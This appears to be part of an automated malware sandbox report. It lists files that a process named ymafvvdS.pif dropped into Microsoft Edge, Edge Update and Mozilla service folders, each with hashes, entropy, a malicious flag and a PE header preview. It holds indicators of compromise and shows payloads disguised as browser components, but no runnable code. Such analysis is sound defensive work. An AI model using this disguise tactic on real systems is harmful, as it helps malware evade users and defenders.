                                                                                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."......2...........b.........@.............................`%.......$... .........................................p%......>).......@..................................8.......................(....c..@........... 0..P............................text....0.......2.................. ..`.rdata.......P.......6..............@..@.data...4...........................@....pdata..............................@..@.00cfg..0...........................@..@.gxfg............0..................@..@.retplne.................................tls....!...........................@..._RDATA..\.... ......................@..@malloc_h.....0...................... ..`.rsrc........@......................@..@.reloc.......`......................@...........................................................................................................................................

                                                                                                                                                                                                                        C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1825280
                                                                                                                                                                                                                        Entropy (8bit):7.151966600472169
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:24576:A70E0ZCQZMib6Rrt9RoctGfmdd6qYdTt/hXV0cfQ9Y4:U0EzQS7RPRoc1+qQTt/hXV0cD
                                                                                                                                                                                                                        MD5:0DCAD7702A47527130D0F4157CD802C7
                                                                                                                                                                                                                        SHA1:9C221AFA171B605EE54343CD2AC47D559E23D634
                                                                                                                                                                                                                        SHA-256:E151F1F09814B0A267DDB5770300B9D03646B0E629D0370AA186D329FF0C081C
                                                                                                                                                                                                                        SHA-512:C08B9D02A87A3E7A058612C9B570402DAEBD712931E8AF39458646B7A4C474D9707263248043229A9BF9B1A379290ED1BD5849B3079E14C210008654B12CFF05
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."..........v.......k.........@.............................0......G..... ..........................................u......ly....... ..........,....................d..T...................hc..(.......@...........@... ............................text............................... ..`.rdata.............................@..@.data........@......."..............@....pdata..,...........................@..@.00cfg..0...........................@..@.gxfg....,..........................@..@.retplne.................................tls................................@..._RDATA..\...........................@..@malloc_h............................ ..`.rsrc........ ......................@..@.reloc.......0......................@...........................................................................................................................................

                                                                                                                                                                                                                        C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exe

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1847808
                                                                                                                                                                                                                        Entropy (8bit):7.138939563176706
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:24576:LiD2VmA1YXiHwlklb8boUuWPg2gBqYdTt/hXV0cfQ9Y4:mD2VmAygwIb8boQKqQTt/hXV0cD
                                                                                                                                                                                                                        MD5:3AA07553EF10EC5A6ED1FA0C3E06E634
                                                                                                                                                                                                                        SHA1:4A339459C114209A26425769621556D56544BE6E
                                                                                                                                                                                                                        SHA-256:25BACB30DA015E1BF544B222B8D1B5E368427B0EF9EFDA537959E9992E63C7B1
                                                                                                                                                                                                                        SHA-512:53185D87AB36092011B5E583752FAE33319326E00E8A32D1DAC7E7AFC6C90220334594AE03E2F9F1EA9184E97887AECB5C031BB771133D5AB8256DB9B888E04B
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."..................p.........@.............................p............ .........................................2...........d....`..8....P..........................8......................(.......@...............X...(........................text...4........................... ..`.rdata..|...........................@..@.data................r..............@....pdata.......P.......n..............@..@.00cfg..0...........................@..@.gxfg....,..........................@..@.retplne..... ...........................tls.........0.......0..............@..._RDATA..\....@.......2..............@..@malloc_h.....P.......4.............. ..`.rsrc...8....`.......6..............@..@.reloc.......p.......B..............@...........................................................................................................................................

                                                                                                                                                                                                                        C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exe

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):2853376
                                                                                                                                                                                                                        Entropy (8bit):6.946185399959636
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:49152:4fD3zO9ZhBGlohzM3HRNr00CqQTt/hXV0cD:SDaalSzM00WTthF3
                                                                                                                                                                                                                        MD5:C4B1B5103932EB2D97FC0FEF10AD388A
                                                                                                                                                                                                                        SHA1:EB8B1E7DA196F567FFE9BD87DF01E6781B4B6184
                                                                                                                                                                                                                        SHA-256:58F24215EB9356C584CC7A7A67E6FAC282E328E45148AB936D12CB2B350F0EE5
                                                                                                                                                                                                                        SHA-512:AF675C162B797D9ED0759849BDE050630652A6CE0F2443FEDDA2E920ABA1AF1520EA8F26361C79A77185BF7D61149FAEB00753516A5C0934A495EDA41A2F6642
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."......l...2......@..........@..............................-......<,... .................................................h.........!.. ...P ........................8......................(...P...@...............x............................text....k.......l.................. ..`.rdata...............p..............@..@.data...T....p.......^..............@....pdata.......P ......d..............@..@.00cfg..0.... !......* .............@..@.gxfg...P1...0!..2..., .............@..@.retplne.....p!......^ ..................tls..........!......` .............@...LZMADEC.......!......b ............. ..`_RDATA..\.....!......t .............@..@malloc_h......!......v ............. ..`.rsrc.... ....!.."...x .............@..@.reloc........$.......".............@...................................................................................................

                                                                                                                                                                                                                        C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exe

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):4320256
                                                                                                                                                                                                                        Entropy (8bit):6.8216498122615805
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:49152:mTaRe7mkn5KLvD5qGVC008/pb4tgLUgGEsLABD5wTQh07yrLMLl9YPhtqQTt/hXF:5I72Lvkr4pbxJRoIMeTthF3
                                                                                                                                                                                                                        MD5:A3C9C84AD26A6A36DA7F87D8DE1BFB18
                                                                                                                                                                                                                        SHA1:911B189CB92DEE2457DECCBA64204D867069E1AD
                                                                                                                                                                                                                        SHA-256:F3DBFC93B35BE2FAE2E359DEFE4082B148EA4B8542F4C0165DF9F58E23A10F2C
                                                                                                                                                                                                                        SHA-512:E10A86AB2953BB3526A731129BD19360B1AFC634B8041F576B5AD9DC50D59C42C2140472DAFDB93A5F885BEE6F74DF5DE6DAA7C61850FC8083E533C1B2AA427A
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e..........".......,......... k.........@..............................C....../B... ..........................................'3......+3.P.....8.x....P6..e..................h.2.T.....................2.(...P"-.@............43.......3. ....................text...E.,.......,................. ..`.rdata..4#....-..$....,.............@..@.data........@4.......4.............@....pdata...e...P6..f...45.............@..@.00cfg..0.....7.......6.............@..@.gxfg...@4....7..6....6.............@..@.retplne......8.......6..................tls....-.... 8.......6.............@...CPADinfo8....08.......6.............@...LZMADEC......@8.......6............. ..`_RDATA..\....`8.......6.............@..@malloc_h.....p8.......6............. ..`.rsrc...x.....8.......6.............@..@.reloc... ...p:.......8.............@...........................................................

                                                                                                                                                                                                                        C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exe

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):2062336
                                                                                                                                                                                                                        Entropy (8bit):7.091440517731825
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:24576:zW9Jml9mmijxiMnF+ZxmQWcbLw8VqqYdTt/hXV0cfQ9Y4:zWnm5iAMkjmQWkVqqQTt/hXV0cD
                                                                                                                                                                                                                        MD5:F44A836D4CE4288E293AF445FFB30AC5
                                                                                                                                                                                                                        SHA1:29244B46BC0DC72A58747FCC7F2CD6A67DFAAABA
                                                                                                                                                                                                                        SHA-256:8C1B0EA48AAA16DCE080971B35BE77F513C5C52BE28030D55837AB552C42FCD6
                                                                                                                                                                                                                        SHA-512:3BF5408DE55DA1B031AF818D26465D04EFD264321EDC92659C4B18D7530BEA2351C224CE04DA355AE0D28D9770431C4A50253AA63263A7491679263A3DB71193
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."......h...4......P..........@.............................. .......... .................................................Z...................H......................8.......................(...`...@...........(...@............................text....g.......h.................. ..`.rdata...).......*...l..............@..@.data...............................@....pdata..H...........................@..@.00cfg..0....P.......H..............@..@.gxfg...p-...`.......J..............@..@.retplne.............x...................tls.................z..............@...CPADinfo8............|..............@..._RDATA..\............~..............@..@malloc_h............................ ..`.rsrc...............................@..@.reloc..............................@...................................................................................................

                                                                                                                                                                                                                        C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exe

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1801216
                                                                                                                                                                                                                        Entropy (8bit):7.1598008601936955
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:24576:dwNHwoYhua6MZERO4qbBJTY6mY1uIggqYdTt/hXV0cfQ9Y4:dwNPdNO7BJTfmETqQTt/hXV0cD
                                                                                                                                                                                                                        MD5:C9C99CC495C962B8044F23938CF6467C
                                                                                                                                                                                                                        SHA1:493A6C555DC6784013689A01BE44242B36094F7E
                                                                                                                                                                                                                        SHA-256:D2D1ECD9EAEE6DA49DE149C1F7128200CE9BBB42D852184B1C290A23A8027D17
                                                                                                                                                                                                                        SHA-512:4465FFDF51B3B305442797C216114AF153A44AB35F38E1791F7B083944235C733CD49458294682B47CBD8E8DB4EB212F6475B1B70B785E5B2E44BABD0631FCDD
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."......*...r......P..........@....................................Oj.... .........................................C...........................T.......................T.......................(....R..@............"..8.......`....................text....(.......*.................. ..`.rdata.......@......................@..@.data...@...........................@....pdata..T...........................@..@.00cfg..0....@.......N..............@..@.gxfg....,...P...,...P..............@..@.retplne.............|...................tls.................~..............@..._RDATA..\...........................@..@malloc_h............................ ..`.rsrc...............................@..@.reloc..............................@...........................................................................................................................................

                                                                                                                                                                                                                        C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1847808
                                                                                                                                                                                                                        Entropy (8bit):7.138944424817521
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:24576:TiD2VmA1YXiHwlklb8boUuWPg2gBqYdTt/hXV0cfQ9Y4:OD2VmAygwIb8boQKqQTt/hXV0cD
                                                                                                                                                                                                                        MD5:2E5EC96CB611C26A6FC78F8AB007BA23
                                                                                                                                                                                                                        SHA1:E4AFC3E575A026331C922C51B179796E9EA0F08D
                                                                                                                                                                                                                        SHA-256:E8988F5E9F3113BC4D46536254ABF700EBF81A8BB7BD1B1C44B4A1D16FA52840
                                                                                                                                                                                                                        SHA-512:83640C94203A2BDB392AEB0B99A51228EEB6225A308F7769E0FEC40E8B7CA131A0D8564E492E066581C8273EFB8DB17B058E4685287508952D01799B763802E7
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."..................p.........@.............................p.......Q.... .........................................2...........d....`..8....P..........................8......................(.......@...............X...(........................text...4........................... ..`.rdata..|...........................@..@.data................r..............@....pdata.......P.......n..............@..@.00cfg..0...........................@..@.gxfg....,..........................@..@.retplne..... ...........................tls.........0.......0..............@..._RDATA..\....@.......2..............@..@malloc_h.....P.......4.............. ..`.rsrc...8....`.......6..............@..@.reloc.......p.......B..............@...........................................................................................................................................

                                                                                                                                                                                                                        C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exe

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1801216
                                                                                                                                                                                                                        Entropy (8bit):7.15980380519573
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:24576:KwNHwoYhua6MZERO4qbBJTY6mY1uIggqYdTt/hXV0cfQ9Y4:KwNPdNO7BJTfmETqQTt/hXV0cD
                                                                                                                                                                                                                        MD5:B7B8BDCAC6D08E13DCFB07133DE4F565
                                                                                                                                                                                                                        SHA1:FC8F374E2BDFBA93399BE90A2573B6FB593D5B9D
                                                                                                                                                                                                                        SHA-256:DFC3C352F252759371C6525310F29284FFA10C436A7D5E49F29EACD027CA959A
                                                                                                                                                                                                                        SHA-512:5D44125DABBFB10CD48CAA38199390AA86BFA742624A80571030E7004803FB556CDC491FE05B7598B487695E720A7D7CF0C4FDA0BD5F5B72B371598CC77D8BA5
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."......*...r......P..........@....................................y'.... .........................................C...........................T.......................T.......................(....R..@............"..8.......`....................text....(.......*.................. ..`.rdata.......@......................@..@.data...@...........................@....pdata..T...........................@..@.00cfg..0....@.......N..............@..@.gxfg....,...P...,...P..............@..@.retplne.............|...................tls.................~..............@..._RDATA..\...........................@..@malloc_h............................ ..`.rsrc...............................@..@.reloc..............................@...........................................................................................................................................

                                                                                                                                                                                                                        C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exe

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1325568
                                                                                                                                                                                                                        Entropy (8bit):5.133694455183824
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:12288:4ALlbRfky6B+mC7WZkYgb4+m+5HDL72ntF/YLKkLzEwBkx0o0GHiKQn9Y4:4ylbht6BHvqYdTt/hXV0cfQ9Y4
                                                                                                                                                                                                                        MD5:0004EFB4514028CB9E43867F3A4D275A
                                                                                                                                                                                                                        SHA1:55391C55B4D1F92B83F19D03113DDE81EEB27FE9
                                                                                                                                                                                                                        SHA-256:0A8BB0282083F31849E6AC8A2F651A64E00B3CBCDFF60DA78C98CE558CB8CC96
                                                                                                                                                                                                                        SHA-512:1459A4B7400A55A2B3BC9C27A860BB59F66466E547BC0FB4ED31B1721B61CA872DD2C26AA043A0B6D031918C4D332B54A7C113B3186A1E907B872DF45A26B6B5
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......o.y.+c..+c..+c..?...!c..?....c..?...9c..I...:c..I...8c..I....c..?...*c..?....c..+c..Xc......)c.....*c..+c..|c......*c..Rich+c..........................PE..L...B(.d.................^..........@........p....@.................................p.......................................H...<........q..........................pu..p...........................X...@...............@....k..`....................text...`\.......^.................. ..`.data........p.......b..............@....idata...............l..............@..@.didat...............v..............@....rsrc....q.......r...x..............@..@.reloc...`...0...P..................@...........................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateBroker.exe

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1221120
                                                                                                                                                                                                                        Entropy (8bit):5.130117383941093
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:12288:ZIkOkTB+w8WZkYgb4+m+5HDL72ntF/YLKkLzEwBkx0o0GHiKQn9Y4:ZIxkTBVTqYdTt/hXV0cfQ9Y4
                                                                                                                                                                                                                        MD5:03FE885B9A8C7E4C39E99AEACA78CAB1
                                                                                                                                                                                                                        SHA1:72CF1E67A1706BC96D68C87FBBAB427023918808
                                                                                                                                                                                                                        SHA-256:C870ED07388E36BED619ECD6FA430236D0C5C4E651F59B90ACEF6DB46502385E
                                                                                                                                                                                                                        SHA-512:4B48B1A9066D4F930C577C7FADC65D679019AA9192A73734CFF7FBA9845AB3AAC3860F2F00418A759D9043DB0BB6DBCB0E0D140508B8FB4AB7DFEB072F5570D9
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........,.B...B...B...A...B...G...B...F...B...G...B...F...B...A...B...C...B...C..B...G...B......B......B...@...B.Rich..B.........................PE..L...8(.d..........................................@.................................o.......................................x...(....`..X3..............................p...............................@.......................@....................text............................... ..`.rdata...`.......b..................@..@.data........0......................@....didat.......P......................@....rsrc...X3...`...4..................@..@.reloc...`.......P...R..............@...................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exe

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1335296
                                                                                                                                                                                                                        Entropy (8bit):5.229032573509208
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:12288:24lssmroCVWZkYgb4+m+5HDL72ntF/YLKkLzEwBkx0o0GHiKQn9Y45:2cssmrmqYdTt/hXV0cfQ9Y4
                                                                                                                                                                                                                        MD5:FF60FE5EFAD9913EA0302DD6EE06494C
                                                                                                                                                                                                                        SHA1:F6F1F80C0155673E7E41FB1251CDE65D58E3F5D4
                                                                                                                                                                                                                        SHA-256:6B6869FF015682381491E634D9BF2E66B80B35F65ED59BFE108AF1962C29C7EE
                                                                                                                                                                                                                        SHA-512:C3A5F2FB3FDEA69303E85A8C8A71D788F1F1365852B01236EA6FCF4F0A57A5CFD5C342BB2C718A5033D06CA27C8C0489C4D893072D10FE382D31669564E08FD2
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............O.@.O.@.O.@.$.A.O.@.$.A|O.@.7.A.O.@.7.A.O.@.7.A.O.@W6.A.O.@.$.A.O.@.$.A.O.@.$.A.O.@.O.@IN.@W6.A.O.@W6.@.O.@W6.A.O.@Rich.O.@........PE..d...@(.d.........."......n...........].........@.......................................... .....................................................(............@..........................p.......................(...p,..@...............0............................text....l.......n.................. ..`.rdata..8z.......|...r..............@..@.data...P3..........................@....pdata.......@......................@..@.didat.......`......................@..._RDATA.......p......................@..@.rsrc...............................@..@.reloc...P.......@... ..............@...........................................................................................................................................................

                                                                                                                                                                                                                        C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exe

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1383936
                                                                                                                                                                                                                        Entropy (8bit):5.330860311171296
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:24576:i7fcT++foSBWU2YxhkgNqYdTt/hXV0cfQ9Y4:6fcK+foQWU2YnPNqQTt/hXV0cD
                                                                                                                                                                                                                        MD5:585644551DBD80092E9548718B8AF1C6
                                                                                                                                                                                                                        SHA1:079689FA3450FDFB65C85FD0E78BAD98F2E63EA5
                                                                                                                                                                                                                        SHA-256:3CB9CDA67EDFB5404690BD29D6CE50926E86FBCE5865CE6784C63C9789C2185C
                                                                                                                                                                                                                        SHA-512:CD2C1027350946882EED0CA5BC80983E2E3DD772E530A93526C6ED5BFFD1D9BED23EB06371B3C30B6ABC3ACF2185D98F6FA00E4CC0B8F24B175AB58801F45D17
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............wU..wU..wU.tT..wU.rTg.wU..sT..wU..tT..wU..rT..wU.sT..wU.qT..wU.vT..wU..vUQ.wUK.~T..wUK..U..wUK.uT..wURich..wU........PE..L...B(.d............................p.............@.........................................................................y..........H3...........................g..p....................g..........@....................x.......................text............................... ..`.rdata...z.......|..................@..@.data....'...........z..............@....didat..$...........................@....rsrc...H3.......4..................@..@.reloc...p.......`..................@...................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exe

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1221120
                                                                                                                                                                                                                        Entropy (8bit):5.130172941025364
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:12288:obrNRzB+NCWZkYgb4+m+5HDL72ntF/YLKkLzEwBkx0o0GHiKQn9Y4:obBRzBgtqYdTt/hXV0cfQ9Y4
                                                                                                                                                                                                                        MD5:FE88DF4257739DACF395D1D7F2748C33
                                                                                                                                                                                                                        SHA1:F9B89B23B61FFBCE8311DBCFC6E244FDA921B8A2
                                                                                                                                                                                                                        SHA-256:BE93282EB4EE8C78EC3A39C8CE8ADC2497D83354A750FBBA2B2306F04F975068
                                                                                                                                                                                                                        SHA-512:948F3DDB4660283BAFCD677AB801779A4026B0E94448740767B006F4004F11FD92269755DA6700EEDA252E67639F5BFF5BCD6D6A70DAE3FD2F925309AAB3B8E8
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........,.B...B...B...A...B...G...B...F...B...G...B...F...B...A...B...C...B...C..B...G...B......B......B...@...B.Rich..B.........................PE..L...7(.d..........................................@.............................................................................(....`..X3..............................p...............................@...................<...@....................text............................... ..`.rdata...`.......b..................@..@.data........0......................@....didat.......P......................@....rsrc...X3...`...4..................@..@.reloc...`.......P...R..............@...................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exe

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):2168832
                                                                                                                                                                                                                        Entropy (8bit):7.938448016926182
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:49152:Py53w24gQu3TPZ2psFkiSqwozLqQTt/hXV0cD:PyFQgZqsFki+ozDTthF3
                                                                                                                                                                                                                        MD5:C43C52F78479D8E174DD7E5BE52E7B0E
                                                                                                                                                                                                                        SHA1:0F5BA8FC5AC0E054B31D82D98E427FB26DDF700B
                                                                                                                                                                                                                        SHA-256:8C6314F52128E7E9391EBB4D17B8CAE7D25E123C3052AA18D7E27D04641BF00E
                                                                                                                                                                                                                        SHA-512:F379DFB7D94A08BE32D481E2F75990E0EC1F0FD5FC8DCEE9CAEAD1D818AB8219836A0857AD2617B7FF6BD266ACDF86409E416FA375B2FC3DD8AF1525CEDF717D
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......d..[ e.. e.. e..4...+e..4....e..B...1e..B...4e......-e..B....e..4...3e..4...!e..4...-e.. e...e....@.!e.. e(.ve......!e..Rich e..................PE..L....(.d............................ }............@..........................p!.......!......................................?..x....................................1..p....................1..........@...............H...T>..`....................text...*........................... ..`.rdata..............................@..@.data...,....P.......8..............@....didat..,....p.......B..............@....rsrc................D..............@..@.reloc.......p.......(..............@...................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Program Files (x86)\Mozilla Maintenance Service\logs\maintenanceservice.log

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
                                                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):3141
                                                                                                                                                                                                                        Entropy (8bit):4.813593782728129
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:24:l2dwQrbeP4BrRzRWtFgRWmIFW1w3JuPhRWqFwvRxRWlbFRW07F9vWYRWqNFRq4+c:EieRo1mvyXJe4dqY3pnGD
                                                                                                                                                                                                                        MD5:1403E7F97DAB3BBC362E4A4A59AAEBAD
                                                                                                                                                                                                                        SHA1:3D4E073F904284E941144B832D95A0963916E11B
                                                                                                                                                                                                                        SHA-256:74064A0345CEDB91188A2356CFD855C38A62BCF4C5FD29D17D54D0A0D89CE2F6
                                                                                                                                                                                                                        SHA-512:A96E48A8F7B715D6D7071EBFD93F51BFD9D8FBDFCEA878F7DC4766E355E416BAB8095B2823AD4ECE2D9492718EB440B07D9519639BA16951AC16F355DAF8A007
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:2024-12-10 01:05:44-0500: Disabled unneeded token privilege: SeAssignPrimaryTokenPrivilege...2024-12-10 01:05:44-0500: Disabled unneeded token privilege: SeAuditPrivilege...2024-12-10 01:05:44-0500: Disabled unneeded token privilege: SeBackupPrivilege...2024-12-10 01:05:44-0500: Disabled unneeded token privilege: SeCreateGlobalPrivilege...2024-12-10 01:05:44-0500: Disabled unneeded token privilege: SeCreatePagefilePrivilege...2024-12-10 01:05:44-0500: Disabled unneeded token privilege: SeCreatePermanentPrivilege...2024-12-10 01:05:44-0500: Disabled unneeded token privilege: SeCreateSymbolicLinkPrivilege...2024-12-10 01:05:44-0500: Could not disable token privilege value: SeCreateTokenPrivilege. (1300)..2024-12-10 01:05:44-0500: Disabled unneeded token privilege: SeDebugPrivilege...2024-12-10 01:05:44-0500: Could not disable token privilege value: SeEnableDelegationPrivilege. (1300)..2024-12-10 01:05:44-0500: Disabled unneeded token privilege: SeImpersonatePrivilege...2024-12-10 01:05:4

                                                                                                                                                                                                                        C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1356800
                                                                                                                                                                                                                        Entropy (8bit):5.347825833969815
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:24576:DQVTZu0JksqjnhMgeiCl7G0nehbGZpbD:0VTZuFDmg27RnWGj
                                                                                                                                                                                                                        MD5:5AF7A965937863A10C99D5EC19A974A5
